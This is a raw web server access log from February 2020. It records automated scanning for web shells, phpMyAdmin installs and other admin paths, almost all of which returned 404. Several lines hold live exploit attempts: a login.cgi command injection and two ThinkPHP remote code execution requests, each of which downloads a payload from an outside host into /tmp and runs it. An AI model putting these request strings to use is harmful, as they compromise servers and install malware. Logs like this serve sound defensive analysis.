125.72.69.122 - - [04/Feb/2020:16:06:47 +0100] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:48 +0100] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:48 +0100] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:48 +0100] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:48 +0100] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:49 +0100] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:49 +0100] "GET /images/jsspwneed.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:50 +0100] "GET /images/stories/cmd.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:50 +0100] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:50 +0100] "GET /up.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:51 +0100] "GET /laravel.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
220.116.93.35 - - [04/Feb/2020:16:06:51 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.176.25/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
125.72.69.122 - - [04/Feb/2020:16:06:54 +0100] "GET /huoshan.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:54 +0100] "GET /yu.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:55 +0100] "GET /floaw.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:55 +0100] "GET /ftmabc.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:55 +0100] "GET /doudou.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:56 +0100] "GET /mjx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:56 +0100] "GET /xiaoxia.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:56 +0100] "GET /yuyang.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:56 +0100] "GET /zz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:57 +0100] "GET /coonig.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:57 +0100] "GET /ak.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:57 +0100] "GET /baidoubi.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:57 +0100] "GET /hhhhhh.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:58 +0100] "GET /meijianxue.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:58 +0100] "GET /no1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:58 +0100] "GET /python.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:58 +0100] "GET /woshimengmei.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:58 +0100] "GET /indea.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:59 +0100] "GET /taisui.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:59 +0100] "GET /xiaxia.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
3.88.62.214 - - [04/Feb/2020:16:07:03 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
125.72.69.122 - - [04/Feb/2020:16:07:06 +0100] "GET /kk.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:06 +0100] "GET /xsser.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:07 +0100] "GET /zzz.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:07 +0100] "GET /99.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:09 +0100] "GET /dp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:11 +0100] "GET /hs.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:11 +0100] "GET /1ts.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:13 +0100] "GET /haiyan.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:13 +0100] "GET /phpdm.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:13 +0100] "GET /root.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:14 +0100] "GET /5678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:14 +0100] "GET /root11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:14 +0100] "GET /xiu.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:07:15 +0100] "POST /wuwu11.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:07:35 +0100] "POST /xw.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [04/Feb/2020:16:07:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.23.62.85 - - [04/Feb/2020:16:07:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
125.72.69.122 - - [04/Feb/2020:16:07:57 +0100] "POST /xw1.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:08:18 +0100] "POST /9678.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
1.52.82.110 - - [04/Feb/2020:16:08:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:08:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:08:52 +0100] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:09:14 +0100] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:09:35 +0100] "POST /sheep.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [04/Feb/2020:16:09:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:09:56 +0100] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:09:56 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:09:57 +0100] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:09:59 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
125.72.69.122 - - [04/Feb/2020:16:10:20 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [04/Feb/2020:16:10:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:10:50 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
125.72.69.122 - - [04/Feb/2020:16:11:12 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
125.72.69.122 - - [04/Feb/2020:16:11:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
212.91.246.72 - - [04/Feb/2020:16:11:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:11:59 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
125.72.69.122 - - [04/Feb/2020:16:12:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
212.91.246.72 - - [04/Feb/2020:16:12:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:12:47 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
125.72.69.122 - - [04/Feb/2020:16:13:19 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:20 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:20 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:20 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:20 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:21 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:30 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:13:40 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [04/Feb/2020:16:13:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:14:03 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:07 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:07 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:08 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:08 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:08 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:09 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:09 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:09 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:09 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:09 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:10 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:11 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:11 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:12 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:12 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:13 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:13 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:13 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:13 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:14 +0100] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:14 +0100] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:14 +0100] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:14 +0100] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:14 +0100] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:15 +0100] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:15 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:15 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:15 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:15 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:16 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:16 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:17 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:19 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:19 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:20 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:20 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:21 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:21 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:21 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:21 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:21 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:22 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:23 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:25 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:25 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:25 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:25 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:26 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:27 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:27 +0100] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:28 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:34 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:34 +0100] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
125.72.69.122 - - [04/Feb/2020:16:14:35 +0100] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
